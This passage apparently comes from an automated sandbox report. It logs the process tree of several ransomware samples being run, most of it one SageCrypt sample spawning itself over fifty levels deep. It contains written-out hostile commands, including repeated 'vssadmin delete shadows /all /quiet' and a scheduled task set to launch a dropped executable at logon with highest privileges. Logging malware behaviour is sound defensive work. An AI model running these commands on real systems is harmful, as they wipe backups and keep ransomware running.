                                                                Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2428
                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe
                                                                  Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:4884
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe
                                                                Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:2256
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe
                                                                Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:2188
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe
                                                                Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:2168
                                                                • C:\Windows\syswow64\svchost.exe
                                                                  C:\Windows\syswow64\svchost.exe
                                                                  4⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:36852
                                                                  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                    5⤵
                                                                    • DcRat
                                                                    • Adds Run key to start application
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:36888
                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe
                                                                Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Sets desktop wallpaper using registry
                                                                • System Location Discovery: System Language Discovery
                                                                • Modifies Control Panel
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:2444
                                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                                  "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\DesktopOSIRIS.htm
                                                                  4⤵
                                                                  • Modifies Internet Explorer settings
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:13716
                                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:13716 CREDAT:275457 /prefetch:2
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies Internet Explorer settings
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:47940
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys9BA3.tmp"
                                                                  4⤵
                                                                    PID:12592
                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe
                                                                  Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:672
                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe
                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe" g
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:41368
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                                                    4⤵
                                                                    • DcRat
                                                                    • Luminosity
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:41020
                                                                  • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Enumerates connected drives
                                                                    • Sets desktop wallpaper using registry
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies Control Panel
                                                                    • Modifies data under HKEY_USERS
                                                                    • Modifies registry class
                                                                    PID:36972
                                                                    • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:36940
                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Interacts with shadow copies
                                                                      PID:54968
                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                      5⤵
                                                                      • Interacts with shadow copies
                                                                      PID:35168
                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                      5⤵
                                                                      • Interacts with shadow copies
                                                                      PID:11072
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                      5⤵
                                                                      • Modifies Internet Explorer settings
                                                                      PID:36244
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                      5⤵
                                                                        PID:11200
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                                                                      4⤵
                                                                        PID:5224
                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                      Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      PID:2164
                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:41584
                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5512
                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:3672
                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4004
                                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:26924
                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                  9⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:56308
                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                    10⤵
                                                                                      PID:10428
                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                        11⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:11252
                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                          12⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:10668
                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                            13⤵
                                                                                              PID:46748
                                                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                14⤵
                                                                                                  PID:15080
                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                    15⤵
                                                                                                      PID:41796
                                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                        16⤵
                                                                                                          PID:14560
                                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                            17⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:32548
                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                              18⤵
                                                                                                                PID:3992
                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                  19⤵
                                                                                                                    PID:45104
                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                      20⤵
                                                                                                                        PID:27932
                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                          21⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:20900
                                                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                            22⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3136
                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                              23⤵
                                                                                                                                PID:53312
                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                  24⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:12904
                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                    25⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:11844
                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                      26⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:50960
                                                                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                        27⤵
                                                                                                                                          PID:48228
                                                                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                            28⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:40200
                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                              29⤵
                                                                                                                                                PID:35404
                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                  30⤵
                                                                                                                                                    PID:38080
                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                      31⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:9796
                                                                                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                        32⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:7780
                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                          33⤵
                                                                                                                                                            PID:34496
                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                              34⤵
                                                                                                                                                                PID:33552
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                  35⤵
                                                                                                                                                                    PID:30924
                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                      36⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:32668
                                                                                                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                        37⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:25632
                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                          38⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:24952
                                                                                                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                            39⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:33904
                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                              40⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:18076
                                                                                                                                                                              • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                41⤵
                                                                                                                                                                                  PID:6520
                                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                    42⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:43092
                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                      43⤵
                                                                                                                                                                                        PID:3676
                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                          44⤵
                                                                                                                                                                                            PID:26992
                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                              45⤵
                                                                                                                                                                                                PID:18624
                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                  46⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:52492
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                    "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                    47⤵
                                                                                                                                                                                                      PID:53408
                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                        "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                        48⤵
                                                                                                                                                                                                          PID:12816
                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                            49⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:51904
                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                              50⤵
                                                                                                                                                                                                                PID:47584
                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                  51⤵
